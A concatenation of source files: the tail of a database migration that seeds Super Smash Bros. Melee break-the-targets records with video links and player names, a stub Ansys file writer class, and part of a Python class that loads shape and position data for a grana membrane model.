https://www.youtube.com/watch?v=XZW7yzoicm4
https://www.youtube.com/watch?v=-Ct-Xi2b14w https://www.youtube.com/watch?v=ctKXxjb_awQ https://www.youtube.com/watch?v=ZN9HUkflZ6I https://www.youtube.com/watch?v=tMadLl3Xpe8 https://www.youtube.com/watch?v=JVtDBXOWKL4 N/A https://www.youtube.com/watch?v=EXXwFRse3tQ https://www.youtube.com/watch?v=Ec5LZE2kL-c https://www.youtube.com/watch?v=9kvoI09NKOI https://www.youtube.com/watch?v=1c3rIB0ZfAs https://www.youtube.com/watch?v=MxWTUtKATL0 https://www.youtube.com/watch?v=3Fkuw2mA6lI https://www.youtube.com/watch?v=XADRvLewY8w https://www.youtube.com/watch?v=dCA1Wh5imWE https://www.youtube.com/watch?v=LWEjjCEsEj8 https://www.youtube.com/watch?v=ww6a_Jw-dVE https://www.youtube.com/watch?v=VDoQLTD78Fs N/A https://www.youtube.com/watch?v=HPskgrRWUGk https://www.youtube.com/watch?v=cd4fNwurqCM N/A https://www.youtube.com/watch?v=ZrclOzsYPr8 https://www.youtube.com/watch?v=9acuQxwxxlc https://www.youtube.com/watch?v=xafPVdA7wN8 https://www.youtube.com/watch?v=rbUEAHa_PY0
https://www.youtube.com/watch?v=sJf2e0BJqIY https://www.youtube.com/watch?v=rIvjDVWctFI https://www.youtube.com/watch?v=QyWupUT5H1A https://www.youtube.com/watch?v=whYaDZXh9Qc https://www.youtube.com/watch?v=nUzGH3TgtUo https://www.youtube.com/watch?v=tZElleImoOY https://www.youtube.com/watch?v=xrGXOwiXXxk https://www.youtube.com/watch?v=rkbWhYKl6wQ https://www.youtube.com/watch?v=kIIFc6d_NEg https://www.youtube.com/watch?v=tJwz2p2GYWU https://www.youtube.com/watch?v=Bs-zyl2E6do https://www.youtube.com/watch?v=0NE86xa2VLM https://www.youtube.com/watch?v=TOdeKol0snE https://www.youtube.com/watch?v=GDIrI8Jcnu0 https://www.youtube.com/watch?v=ImXY5Hfm8mc https://www.youtube.com/watch?v=S7RtyMvBcRU https://www.youtube.com/watch?v=ov2x6lM2Nns N/A https://www.youtube.com/watch?v=aAy3WUFIOo4 https://www.youtube.com/watch?v=4KNziOGkqGg https://www.youtube.com/watch?v=cCU3DJOTPgc https://www.youtube.com/watch?v=LYGWjPH5tcA https://www.youtube.com/watch?v=t6IvMVhK5o8 https://www.youtube.com/watch?v=sZxDppKHiZg https://www.youtube.com/watch?v=asGLc59Jzm4
https://www.youtube.com/watch?v=M39VDHDaFAw https://www.youtube.com/watch?v=mit9XGV6PX4 https://www.youtube.com/watch?v=AjkbNKlS6H4 https://www.youtube.com/watch?v=R7n0WLtpIfs https://www.youtube.com/watch?v=_FLsF1GCH_M https://www.youtube.com/watch?v=fZvLnu139cQ https://www.youtube.com/watch?v=xHk0yMvGbvk https://www.youtube.com/watch?v=s8UJBEnKBno https://www.youtube.com/watch?v=KTICHiuVY_c https://www.youtube.com/watch?v=8aHynqFIgAI https://www.youtube.com/watch?v=PhKvZeJ0bMI https://www.youtube.com/watch?v=rns2jmMqxxo https://www.youtube.com/watch?v=hktolVVO1rk https://www.youtube.com/watch?v=RNcTJBlr1ZQ https://www.youtube.com/watch?v=kFwSI7PMLNk https://www.youtube.com/watch?v=9cVSImadCYg https://www.youtube.com/watch?v=WMaFacJDITA https://www.youtube.com/watch?v=DcMSwOMkKhI https://www.youtube.com/watch?v=ujNYTQpxxD4 https://www.youtube.com/watch?v=WGEDJ7lkr4E https://www.youtube.com/watch?v=TKtVsr-vE6w https://www.youtube.com/watch?v=oISLO1QWrSE https://www.youtube.com/watch?v=PvrrTAIXA_A https://www.youtube.com/watch?v=ecOBvu-y8qw https://www.youtube.com/watch?v=53uF8JybCa0
https://www.youtube.com/watch?v=Yh5W9s_WA_g https://www.youtube.com/watch?v=dWErJI7Exzk https://www.youtube.com/watch?v=Rgnbh57gm-g https://youtu.be/Pk7IaR_CL4w?t=37 https://www.youtube.com/watch?v=PzgeIuQQutY https://youtu.be/Pk7IaR_CL4w?t=60 https://youtu.be/Pk7IaR_CL4w?t=71 https://www.youtube.com/watch?v=OjgLAWq4k4U https://www.youtube.com/watch?v=aOb4y8Oj-84 https://youtu.be/Pk7IaR_CL4w?t=101 https://youtu.be/Pk7IaR_CL4w?t=112 https://youtu.be/Pk7IaR_CL4w?t=125 https://youtu.be/Pk7IaR_CL4w?t=140 https://youtu.be/Pk7IaR_CL4w?t=154 https://youtu.be/Pk7IaR_CL4w?t=166 https://www.youtube.com/watch?v=Sp6ojv_c9ks https://youtu.be/Pk7IaR_CL4w?t=190 https://youtu.be/Pk7IaR_CL4w?t=200 https://youtu.be/Pk7IaR_CL4w?t=216 https://www.youtube.com/watch?v=6MQyBmscItM https://www.youtube.com/watch?v=2vljcuawHwo https://youtu.be/Pk7IaR_CL4w?t=263 https://youtu.be/Pk7IaR_CL4w?t=273 https://youtu.be/Pk7IaR_CL4w?t=279 https://youtu.be/Pk7IaR_CL4w?t=290
https://twitter.com/Savestate/status/1094284626699395072 https://twitter.com/Savestate/status/1002748314457202688 https://www.youtube.com/watch?v=E7plcp3-PNw https://twitter.com/Savestate/status/1138412737682391046 https://twitter.com/Savestate/status/989634698392502274 https://twitter.com/Savestate/status/988194536458457089 https://twitter.com/Savestate/status/1002763166563143681 https://twitter.com/Savestate/status/1133938083286704129 https://twitter.com/Savestate/status/1058932199704219648 https://twitter.com/Savestate/status/993645942376222720 https://twitter.com/Savestate/status/993255044651929600 https://twitter.com/Savestate/status/1134953164673826817 https://twitter.com/Savestate/status/1137900814176067584 https://twitter.com/Savestate/status/1010994055281561601 https://twitter.com/Savestate/status/1058821178415038468 https://twitter.com/Savestate/status/1051200393915588613 https://www.youtube.com/watch?v=2E0qyX5jM2I https://twitter.com/Savestate/status/984895162793984001 https://twitter.com/Savestate/status/1058803586568781824 https://twitter.com/Savestate/status/1164602932475637760 https://twitter.com/Savestate/status/1286090236389396480 https://twitter.com/Savestate/status/1286096592253132800 https://twitter.com/Savestate/status/1002729912409747456 https://twitter.com/Savestate/status/1137828392613683205 https://twitter.com/Savestate/status/1094228723098894336
https://www.youtube.com/watch?v=eGqaxmqMYbc https://www.youtube.com/watch?v=XM2btPzyOWo https://www.youtube.com/watch?v=oM9n9XnbTpo https://www.youtube.com/watch?v=JpWJ_4xlGjk https://www.youtube.com/watch?v=8n8O9LDXOVY https://www.youtube.com/watch?v=gDW25OFHVko https://www.youtube.com/watch?v=g_BCqFFU09w https://www.youtube.com/watch?v=W8HCuT6SjXg https://www.youtube.com/watch?v=gclXdjBTF-E https://www.youtube.com/watch?v=2fvQI1vVuCE https://www.youtube.com/watch?v=7UV-4IeoaNQ https://www.youtube.com/watch?v=5pFcHAE9Yrk https://www.youtube.com/watch?v=JjwtM9zh8SM https://www.youtube.com/watch?v=f-GPVeJqJio https://www.youtube.com/watch?v=68pelq7WrXk https://www.youtube.com/watch?v=S1gb9-SOVmo https://www.youtube.com/watch?v=6S0xOWU4NJM https://www.youtube.com/watch?v=TkwWcNeG-JE https://www.youtube.com/watch?v=bK0iLy_gmUs https://www.youtube.com/watch?v=CDAAZuewBf0 https://www.youtube.com/watch?v=FnPU2BuNJMk https://www.youtube.com/watch?v=9EOHBd8R88Q https://www.youtube.com/watch?v=aC8aqqPJiig https://www.youtube.com/watch?v=OWN5GKX-rU0 https://www.youtube.com/watch?v=ZqFskHNPkWE
https://www.youtube.com/watch?v=vJuQEOA4ZCw https://www.youtube.com/watch?v=zYIrQ7rz2Ww https://www.youtube.com/watch?v=DNjzDFMlHG0 https://www.youtube.com/watch?v=E4nm_F9NAss https://www.youtube.com/watch?v=H9jja6AjBaU https://www.youtube.com/watch?v=Bzds1HPYoUM https://www.youtube.com/watch?v=pxa7oClh5jE https://www.youtube.com/watch?v=e7LxK43JAAM https://www.youtube.com/watch?v=E1coxZq8ySQ https://www.youtube.com/watch?v=NWeRoQ9Wp08 https://www.youtube.com/watch?v=iLVfOYZyhnk https://www.youtube.com/watch?v=mlxYqgPKJXo https://www.youtube.com/watch?v=LHSrSsjLj1Q https://www.youtube.com/watch?v=JfJs7_yi0rw https://www.youtube.com/watch?v=UyWq5CZoxKk https://www.youtube.com/watch?v=h3XXph49xtk https://www.youtube.com/watch?v=MsKO5e4e5sM https://www.youtube.com/watch?v=8cKgbNQiFS4 https://www.youtube.com/watch?v=6j8mfKmw458 https://www.youtube.com/watch?v=MBCha68F1vo https://www.youtube.com/watch?v=5UauL1-1JP4 https://www.youtube.com/watch?v=xi1FqrfQSgA https://www.youtube.com/watch?v=bo44Y8Yowes https://www.youtube.com/watch?v=G27ZiUD65Ww https://www.youtube.com/watch?v=fpzTT0j6Vvg
https://www.youtube.com/watch?v=CD9jeevIUzo https://www.youtube.com/watch?v=Np4yexcsRzk https://www.youtube.com/watch?v=eHojMTKx2go https://www.youtube.com/watch?v=XkL2SfPQxjQ https://www.youtube.com/watch?v=vVTW9xgjL6s https://www.youtube.com/watch?v=IuilSUTO3M8 https://www.youtube.com/watch?v=1hgMonUJCb8 https://www.youtube.com/watch?v=l2wnfPKkQ94 https://www.youtube.com/watch?v=_HqcAQewCVU https://www.youtube.com/watch?v=FZ8LB8bJxfw https://www.youtube.com/watch?v=Mynn-YG1kGs https://www.youtube.com/watch?v=2zv79PiKIqE https://www.youtube.com/watch?v=oOooLGmhygY https://www.youtube.com/watch?v=8G7UPqql-as https://www.youtube.com/watch?v=VUGmdNbW1zo https://www.youtube.com/watch?v=H8pV-X3m0Xw https://www.youtube.com/watch?v=fkokgKyIbYM N/A https://www.youtube.com/watch?v=iOU1Zpb8K7Q https://www.youtube.com/watch?v=qqwHdsg2FJY https://www.youtube.com/watch?v=khqP5qGMWQc https://www.youtube.com/watch?v=UTZKUcgrLiE https://www.youtube.com/watch?v=x07gKSrGKm0 https://www.youtube.com/watch?v=0lU5-olJgNY https://www.youtube.com/watch?v=tbLLkwQCkTU
https://www.youtube.com/watch?v=yNjgOfGi20U https://www.youtube.com/watch?v=oSixB9YopwA https://www.youtube.com/watch?v=8G2WtqAMKFQ https://www.youtube.com/watch?v=eKrhC9mmHP0 https://www.youtube.com/watch?v=oWBAH89ptGs https://www.youtube.com/watch?v=CGjPiUiAO1g https://www.youtube.com/watch?v=yW_SeNWLFYM https://www.youtube.com/watch?v=3osknFn0rWo https://www.youtube.com/watch?v=RdRYs64U5tA https://www.youtube.com/watch?v=UnIv_vUBvy8 https://www.youtube.com/watch?v=iqVr5WkmSC4 https://www.youtube.com/watch?v=JbxReYGXx7Y https://www.youtube.com/watch?v=DSEd0AdHTFQ https://www.youtube.com/watch?v=qXfx3ig8EDc https://www.youtube.com/watch?v=pnn43ulBk1c https://www.youtube.com/watch?v=98hzRBepckU https://www.youtube.com/watch?v=Fu-WS17i0BI https://www.youtube.com/watch?v=Go2x0KJWU9Q https://www.youtube.com/watch?v=xyPw6dACBzE https://www.youtube.com/watch?v=RAiS_MAtuis https://www.youtube.com/watch?v=YOdUF7zPpDg https://www.youtube.com/watch?v=GhWShmgkpS0 https://www.youtube.com/watch?v=fKSJbwUwUz4 https://www.youtube.com/watch?v=N10-xMZfgW0 https://www.youtube.com/watch?v=2NSl__4Fo3A
https://www.youtube.com/watch?v=i-aAbeS2_b8 https://www.youtube.com/watch?v=KDzMPg_B2uE https://www.youtube.com/watch?v=eJyxBm6Kj6Q https://www.youtube.com/watch?v=gsTNadm8kHM https://www.youtube.com/watch?v=6ewdi4xBWtU https://www.youtube.com/watch?v=tPUqzy9fsX0 https://www.youtube.com/watch?v=MuV30khGg7c https://www.youtube.com/watch?v=_-4wI0Ewv5M https://www.youtube.com/watch?v=XTv5HcRwEpE https://www.youtube.com/watch?v=z5NmNzw-leM https://www.youtube.com/watch?v=LQHJoMA0gow https://www.youtube.com/watch?v=TSbjTC63Sck https://www.youtube.com/watch?v=MIoXf4Q89q0 https://www.youtube.com/watch?v=7AFM5JeHwbM https://www.youtube.com/watch?v=wRXDaquNDeQ https://www.youtube.com/watch?v=vY4WPZ_mSYo https://www.youtube.com/watch?v=xVisfqT8G2k https://www.youtube.com/watch?v=-JB3JOfchCM https://www.youtube.com/watch?v=Lj9LM1jfGs0 https://www.youtube.com/watch?v=Mg5OY2H_m1E https://www.youtube.com/watch?v=SvXvUYVMh_o https://www.youtube.com/watch?v=CcnuWgtPEsQ https://www.youtube.com/watch?v=ZfqzU-GVUSk https://www.youtube.com/watch?v=Ed9aORUlJtY https://www.youtube.com/watch?v=LD6iiU_xuPQ
https://www.youtube.com/watch?v=VXUfhi5lF6U https://www.youtube.com/watch?v=6cQsIrl72jY https://www.youtube.com/watch?v=UL_cX38sAVE https://www.youtube.com/watch?v=DvuHCyPn9dI https://www.youtube.com/watch?v=GOzd_CklSLg https://www.youtube.com/watch?v=2-bmAgak6-M https://www.youtube.com/watch?v=FT0IxNW9ZBU https://www.youtube.com/watch?v=qHUw7IaOOn0 https://www.youtube.com/watch?v=zcPmF01TqDc https://www.youtube.com/watch?v=gS4-XtlVDMU https://www.youtube.com/watch?v=S8IbOgv4gvY https://www.youtube.com/watch?v=S5B6SHNXYuE https://www.youtube.com/watch?v=X1J_OkRu0H8 https://www.youtube.com/watch?v=NDhftPAy4uU https://www.youtube.com/watch?v=CwXXIzF8xfY https://www.youtube.com/watch?v=c-f_2kr4K9E https://www.youtube.com/watch?v=RC1Ui0tVsJA N/A https://www.youtube.com/watch?v=b7CPkx8vvvY https://www.youtube.com/watch?v=vDD06sevb8g N/A https://www.youtube.com/watch?v=rARIL5EQQ1U https://www.youtube.com/watch?v=3gfI4qciaQE https://www.youtube.com/watch?v=zgfJ8QKdIzI https://www.youtube.com/watch?v=za41VZDU9JA
https://www.youtube.com/watch?v=nr4MlWjyps8 https://www.youtube.com/watch?v=9cEhRffvgD8 https://www.youtube.com/watch?v=uERFNYxn0Bg https://www.youtube.com/watch?v=_3_oJSopLHg https://www.youtube.com/watch?v=y7ZGCFKDMVY https://www.youtube.com/watch?v=oWPwudL2zx4 https://www.youtube.com/watch?v=Qn2kDwlb4_M https://youtu.be/nr4MlWjyps8?t=91 https://www.youtube.com/watch?v=9Xmkl6LXUvg https://youtu.be/nr4MlWjyps8?t=110 https://youtu.be/nr4MlWjyps8?t=120 https://www.youtube.com/watch?v=mBI_5g29-LA https://www.youtube.com/watch?v=xdyhCZKgA5Q https://youtu.be/nr4MlWjyps8?t=166 https://youtu.be/nr4MlWjyps8?t=180 https://www.youtube.com/watch?v=1QCn7WqWZEc https://www.youtube.com/watch?v=_2gpZfQ-s0s N/A https://www.youtube.com/watch?v=w-6b5Cg06X4 https://youtu.be/nr4MlWjyps8?t=226 https://www.youtube.com/watch?v=JANL917rnzI https://www.youtube.com/watch?v=kalcluHqFM0 https://youtu.be/nr4MlWjyps8?t=265 https://www.youtube.com/watch?v=IQ3-IO8LI1I https://www.youtube.com/watch?v=zyimiMrj1mU
https://www.youtube.com/watch?v=8r0T4CCnQMI https://www.youtube.com/watch?v=mFLGo4tJMNY https://www.youtube.com/watch?v=Ex9U1SYiRYk https://www.youtube.com/watch?v=XDLWTmuSQTs https://www.youtube.com/watch?v=OG6Dzlq_2ms https://www.youtube.com/watch?v=ccu5bF7i_Tk https://www.youtube.com/watch?v=7udIr_VZ4ss https://www.youtube.com/watch?v=QsPhqon9Mz4 https://www.youtube.com/watch?v=0JQH4MeKw0U https://www.youtube.com/watch?v=3NexizuoWMc https://www.youtube.com/watch?v=gyEHpOL8S1k https://www.youtube.com/watch?v=jE7MbTCAoNw https://www.youtube.com/watch?v=R4z4Kv47m3E https://www.youtube.com/watch?v=DzSgZXABsvE https://www.youtube.com/watch?v=5pUM25TJZOs https://www.youtube.com/watch?v=DDT85MOsN-0 https://www.youtube.com/watch?v=80n8Fcc_ab4 N/A https://www.youtube.com/watch?v=v_QItrMOidg https://www.youtube.com/watch?v=wM6bWK1ao3g N/A https://www.youtube.com/watch?v=4XTUaYZZwDc https://www.youtube.com/watch?v=1vv2-mmUCJU https://www.youtube.com/watch?v=PAPA5Loj8FQ https://www.youtube.com/watch?v=Z6pcPJcF0NU"""
players_raw = """mudi Samplay Samplay Hawk Samplay Samplay jenkem66 Samplay 2 people Samplay Samplay Hawk Hawk sockdude1 Samplay Hawk Samplay 1 target Samplay Samplay 9 targets Samplay Hawk Samplay Samplay
Jerry3333 LinksDarkArrows Samplay jenkem66 sockdude1 sockdude1 sockdude1 Jerry3333 2 people sockdude1 Jerry3333 Jerry3333 sockdude1 Jerry3333 sockdude1 Jerry3333 sockdude1 Samplay Samplay Samplay Samplay Samplay Jerry3333 sockdude1 Samplay
Samplay Jerry3333 2 people Samplay Samplay Samplay Samplay Samplay Hawk Samplay Samplay Samplay Samplay sockdude1 djwang88 Samplay Samplay 1 target Samplay sockdude1 1221 Samplay Samplay Samplay Samplay
Jerry3333 Jerry3333 Samplay samthedigital Jerry3333 9 targets sockdude1 Jerry3333 Jerry3333 sockdude1 sockdude1 sockdude1 sockdude1 sockdude1 Jerry3333 sockdude1 sockdude1 1 target sockdude1 Jerry3333 8 targets Jerry3333 Jerry3333 sockdude1 Samplay
Bobby Bobby Samplay Bobby sockdude1 sockdude1 Bobby Bobby jenkem66 Bobby Bobby Bobby Bobby sockdude1 Samplay Samplay Bobby sockdude1 Bobby Bobby Bobby Bobby Bobby Bobby Bobby
Samplay Samplay Samplay sockdude1 sockdude1 3 people sockdude1 sockdude1 sockdude1 Samplay sockdude1 Samplay sockdude1 sockdude1 sockdude1 djwang88 Samplay 1 target Samplay sockdude1 9 targets Samplay sockdude1 sockdude1 sockdude1
pokefantom sockdude1 Samplay jenkem66 sockdude1 9 targets sockdude1 Jerry3333 pokefantom sockdude1 sockdude1 Samplay mimorox sockdude1 Samplay Samplay Samplay 1 target pokefantom jenkem66 Samplay Samplay jenkem66 sockdude1 pokefantom
sockdude1 sockdude1 Samplay jenkem66 sockdude1 Samplay Bobby samthedigital mudi sockdude1 sockdude1 sockdude1 sockdude1 jenkem66 mudi sockdude1 jenkem66 jenkem66 sockdude1 sockdude1 9 targets Samplay sockdude1 sockdude1 sockdude1
9 targets mimorox Samplay Bobby sockdude1 jenkem66 sockdude1 megaqwertification 10 people Bobby sockdude1 sockdude1 mimorox sockdude1 megaqwertification megaqwertification sockdude1 0 targets mimorox megaqwertification 8 targets djwang88 Samplay djwang88 djwang88
Samplay Samplay Samplay Samplay Samplay Samplay Samplay Samplay Samplay 8 people Samplay jenkem66 jenkem66 Samplay Samplay Samplay Samplay 9 targets Samplay Samplay Samplay Samplay Samplay Samplay sockdude1
jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 2 people jenkem66 mudi jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 9 targets jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66
sockdude1 Jerry3333 Samplay megaqwertification megaqwertification megaqwertification 1221 sockdude1 megaqwertification Hawk sockdude1 sockdude1 sockdude1 1221 sockdude1 pokefantom sockdude1 6 targets 1221 sockdude1 Samplay Samplay megaqwertification sockdude1 pokefantom
Samplay sockdude1 Samplay sockdude1 sockdude1 9 targets sockdude1 sockdude1 sockdude1 Samplay sockdude1 sockdude1 samthedigital sockdude1 sockdude1 sockdude1 sockdude1 1 target sockdude1 sockdude1 8 targets sockdude1 sockdude1 sockdude1 sockdude1
Jerry3333 Jerry3333 Samplay Jerry3333 Jerry3333 Jerry3333 Jerry3333 Samplay Jerry3333 Samplay Jerry3333 Jerry3333 mimorox samthedigital Jerry3333 Jerry3333 Jerry3333 1 target mimorox sockdude1 Jerry3333 Jerry3333 LinksDarkArrows djwang88 Jerry3333
Samplay Bobby Samplay Bobby Bobby Bobby Bobby Bobby Bobby Samplay Bobby Bobby Bobby Bobby Mario 64 Master Bobby Bobby Samplay Samplay Bobby Bobby Bobby Bobby Bobby Bobby
Jerry3333 Samplay Samplay Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 sockdude1 Jerry3333 Jerry3333 Jerry3333 sockdude1 sockdude1 Jerry3333 Jerry3333 Jerry3333 Jerry3333
Savestate Savestate Samplay Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate samthedigital Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate
Samplay megaqwertification Samplay Jerry3333 Samplay Samplay megaqwertification megaqwertification LinksDarkArrows megaqwertification Samplay Samplay megaqwertification Samplay LinksDarkArrows 2 people Samplay megaqwertification 2 people Samplay Samplay LinksDarkArrows sockdude1 Samplay Samplay
megaqwertification pokefantom Samplay Judge9 pokefantom LinksDarkArrows megaqwertification pokefantom sockdude1 pokefantom pokefantom Samplay mimorox sockdude1 sockdude1 pokefantom megaqwertification Samplay sockdude1 Samplay Samplay pokefantom Samplay sockdude1 pokefantom
Samplay Samplay Samplay Samplay Samplay megaqwertification Samplay Samplay LinksDarkArrows Samplay Samplay Samplay Samplay LinksDarkArrows Samplay jenkem66 jenkem66 1 target sockdude1 sockdude1 Samplay Samplay LinksDarkArrows Samplay jenkem66
Judge9 Judge9 Samplay Judge9 Judge9 Judge9 Judge9 Judge9 Samplay Samplay Judge9 Judge9 Judge9 sockdude1 djwang88 megaqwertification megaqwertification Samplay Judge9 Judge9 mudi Samplay 1221 Judge9 1221
Samplay Samplay Samplay Samplay jenkem66 Samplay Bobby Samplay 2 people Samplay Samplay Bobby mimorox Samplay sockdude1 jenkem66 jenkem66 Samplay jenkem66 Samplay Samplay 3 people jenkem66 Bobby 1221
Jerry3333 Jerry3333 Samplay Samplay Jerry3333 sockdude1 sockdude1 Jerry3333 megaqwertification Samplay sockdude1 Jerry3333 Hawk Jerry3333 Jerry3333 Hawk Jerry3333 1 target Jerry3333 megaqwertification 9 targets pokefantom 4 people Jerry3333 pokefantom
Jerry3333 sockdude1 Samplay Hawk Hawk jenkem66 jenkem66 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Hawk djwang88 Jerry3333 Jerry3333 djwang88 jenkem66 1 target Samplay Jerry3333 Jerry3333 Samplay Jerry3333 sockdude1 Hawk
djwang88 sockdude1 Samplay Samplay sockdude1 djwang88 djwang88 djwang88 2 people djwang88 djwang88 djwang88 djwang88 djwang88 djwang88 sockdude1 djwang88 1 target sockdude1 djwang88 9 targets 2 people LinksDarkArrows djwang88 samthedigital"""
frames = [line.split("\t") for line in frames_raw.split("\n")]
videos = [line.split("\t") for line in videos_raw.split("\n")]
players = [line.split("\t") for line in players_raw.split("\n")]

for (char_index, (char_frames, char_videos, char_players)) in enumerate(
    zip(frames, videos, players)
):
    character = (
        session.query(Character).filter(Character.position == char_index).one()
    )
    for (stage_index, (frame_string, video_link, player_string)) in enumerate(
        zip(char_frames, char_videos, char_players)
    ):
        stage = session.query(Stage).filter(Stage.position == stage_index).one()
        try:
            player = get_player_by_name(session=session, name=player_string)
        except ValueError:
            # entries like "2 people" or "9 targets" are not player names
            player = None
        # "N targets" entries are partial completions; everything else has a time
        if "target" in player_string:
            time = None
            partial_targets = int(player_string[0])
        else:
            time = int(frame_string)
            partial_targets = None
        video_link = video_link if video_link != "N/A" else None
        add_record(
            session=session,
            character=character,
            stage=stage,
            player=player,
            time=time,
            partial_targets=partial_targets,
            video_link=video_link,
        )
try:
    add_char_stage_alias(
        session=session,
        aliased_name="Mr. Game&Watch",
        known_name="Mr. Game & Watch",
    )
    add_char_stage_alias(
        session=session, aliased_name="Doc", known_name="Dr. Mario"
    )
    add_player_alias(session=session, aliased_name="Dr.M", known_name="Dr.M")
except ValueError:
    pass
ties_raw = """Luigi 3.21 samthedigital
Samplay
Yoshi 7.21 sockdude1
aMSa
samthedigital
Ganon 4.7 LinksDarkArrows
sockdude1
Jerry3333
chaos6
mudi
demon9
moOonstermunch
Freezard
airr8897
samthedigital
Falco 4.97 Zampa
sockdude1
mudi
moOonstermunch
marth1
U3TY
Hanky Panky
LinksDarkArrows
Mewtwo 4.55 LinksDarkArrows
Jerry3333
samthedigital
Mr. Game&Watch 2.82 Zampa
sockdude1
Dr.M
samthedigital
YL on Zelda 4.73 Jerry3333
Samplay
Doc on Ganon 3.78 Ravenyte
Hawk
Mario on Ganon 3.78 Ravenyte
jenkem66
Fox on Seak 0.26 Zampa
jenkem66
Roy on Ganon 3.63 Ravenyte
djwang88
Mewtwo on Ganon 3.99 LinksDarkArrows
Bobby
Fox on Ganon 3.78 LinksDarkArrows
jenkem66
Roy on Mewtwo 4.95 Samplay
megaqwertification
YL on Pichu 4.13 megaqwertification
Samplay"""
cur_combo = None
for line in ties_raw.split("\n"):
    combo, _, player_string = line.split("\t")
    # a blank combo column means the row belongs to the previous combo
    if combo and combo != cur_combo:
        cur_combo = combo
    # "X on Y" means character X on stage Y; otherwise both share the name
    if " on " in cur_combo:
        char_string, stage_string = cur_combo.split(" on ")
    else:
        char_string = stage_string = cur_combo
    character = get_character_by_name(session=session, name=char_string)
    stage = get_stage_by_name(session=session, name=stage_string)
    player = get_player_by_name(session=session, name=player_string)
    record = get_record(session=session, character=character, stage=stage)
    # skipping Seak records for now
    if not record:
        continue
    record.players.append(player)


def downgrade():
    pass
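The ties loop above relies on tab-separated rows where a blank first column means "same combo as the previous row", and a combo of the form "X on Y" splits into a character and a stage. A minimal standalone sketch of that forward-fill parsing, using hypothetical sample rows and none of the migration's session helpers:

```python
def parse_ties(raw: str):
    """Forward-fill the combo column of tab-separated tie rows."""
    ties = []
    cur_combo = None
    for line in raw.split("\n"):
        combo, _, player = line.split("\t")
        # blank combo column -> row belongs to the previous combo
        if combo and combo != cur_combo:
            cur_combo = combo
        # "X on Y" means character X on stage Y; otherwise both share the name
        if " on " in cur_combo:
            char_string, stage_string = cur_combo.split(" on ")
        else:
            char_string = stage_string = cur_combo
        ties.append((char_string, stage_string, player))
    return ties


sample = "Luigi\t3.21\tsamthedigital\n\t\tSamplay\nYL on Zelda\t4.73\tJerry3333"
print(parse_ties(sample))
# [('Luigi', 'Luigi', 'samthedigital'), ('Luigi', 'Luigi', 'Samplay'),
#  ('YL', 'Zelda', 'Jerry3333')]
```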


# src/compas_fea/fea/ansys/ansys_file_writer.py (yijiangh/compas_fea, MIT license)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

# Author(s): Tomas Mendez Echenagucia (github.com/tmsmendez)


class AnsysFileWriter(object):
    def __init__(self):  # `self` was missing, which would break instantiation
        pass


# src/grana_model/objectdata.py (fieryWalrus1002/grana_model, MIT license)
from typing import Any, Iterator
import pandas as pd
import random
from math import pi
import numpy as np
import pickle
import os


class ObjectData:
    """Loads shape, sprite, and spawn-position data for grana model objects."""

    def __init__(
        self,
        pos_csv_filename: str,
        spawn_seed=0,
        res_path: str = "src/grana_model/res/",
    ):
        self.__object_colors_dict = {
            "LHCII": (0, 51, 0, 255),  # darkest green
            "LHCII_monomer": (0, 75, 0, 255),  # darkest green
            "C2S2M2": (0, 102, 0, 255),
            "C2S2M": (0, 153, 0, 255),
            "C2S2": (102, 204, 0, 255),
            "C2": (128, 255, 0, 255),
            "C1": (178, 255, 102, 255),  # lightest green
            "CP43": (178, 255, 103, 255),  # same coordinates as C1, same color
            "cytb6f": (51, 153, 255, 255),  # light blue
        }
        self.res_path = res_path
        self.type_dict = {
            obj_type: self.__generate_object_dict(obj_type)
            for obj_type in self.__object_colors_dict.keys()
        }
        self.pos_list = self.__import_pos_data(
            f"{self.res_path}/grana_coordinates/{pos_csv_filename}"
        )
        self.object_list = self.__generate_object_list(
            spawn_seed=spawn_seed,
        )

    def __generate_object_dict(self, obj_type: str):
        obj_dict = {
            "obj_type": obj_type,
            "shapes_compound": self.__load_compound_shapes(obj_type),
            "shapes_simple": self.__load_simple_shapes(obj_type),
            # "sprite": image.load(f"{self.res_path}/sprites/{obj_type}.png"),
            "sprite": os.path.join(self.res_path, f"sprites/{obj_type}.png"),
            "color": self.__object_colors_dict[obj_type],
        }
        return obj_dict

    def __import_pos_data(self, file_path):
        """Imports the (x, y) positions from the csv data file provided in file_path"""
        imported_csv = pd.read_csv(file_path)
        return pd.DataFrame(imported_csv, columns=["x", "y"]).values.tolist()

    def __load_simple_shapes(self, obj_type):
        with open(f"{self.res_path}shapes/{obj_type}_simple.pickle", "rb") as f:
            return pickle.load(f)

    def __load_compound_shapes(self, obj_type):
        with open(f"{self.res_path}shapes/{obj_type}.pickle", "rb") as f:
            return pickle.load(f)
    # def generate_secondary_object_list(
    #     self,
    #     type_dict: dict[Any, Any],
    #     spawn_seed=0,
    # ) -> Iterator[Any]:
    #     '''
    #     Generates a list of dicts, each containing the data needed to create a
    #     PSII secondary structure, in this format:
    #     {
    #         "obj_type": str, # ex. "C2S2M2"
    #         "pos_xy": list, # [x, y] coordinates
    #         "angle": float, # angle in radians
    #         "sprite": ImageData object, a sprite for the object type
    #         "color": (0, 0, 0, 255) RGBA color tuple
    #         "shapes_simple": simple shape coordinate list
    #         "shapes_compound": list of shape coordinate pairs, one for each of
    #             the various compound shapes needed to create the PSII structure
    #     }
    #     The list will be an iterator object that you can use the next() function
    #     on to get the next item
    #     '''
    #     obj_list = []
    #     for pos, obj_type in zip(pos_list, obj_types):
    #         obj_entry = {
    #             "obj_type": obj_type,
    #             "pos": pos,
    #             "angle": (2 * pi * random()),
    #             "sprite": type_dict[obj_type]["sprite"],
    #             "color": type_dict[obj_type]["color"],
    #             "shapes_simple": type_dict[obj_type]["shapes_simple"],
    #             "shapes_compound": type_dict[obj_type]["shapes_compound"],
    #         }
    #         obj_list.append(obj_entry)
    #     return iter(obj_list)

    # def convert_shape_csv_to_shape_list(self, obj_dict):
    #     ''' used to turn csv files into a list of shape lists '''
    #     return [
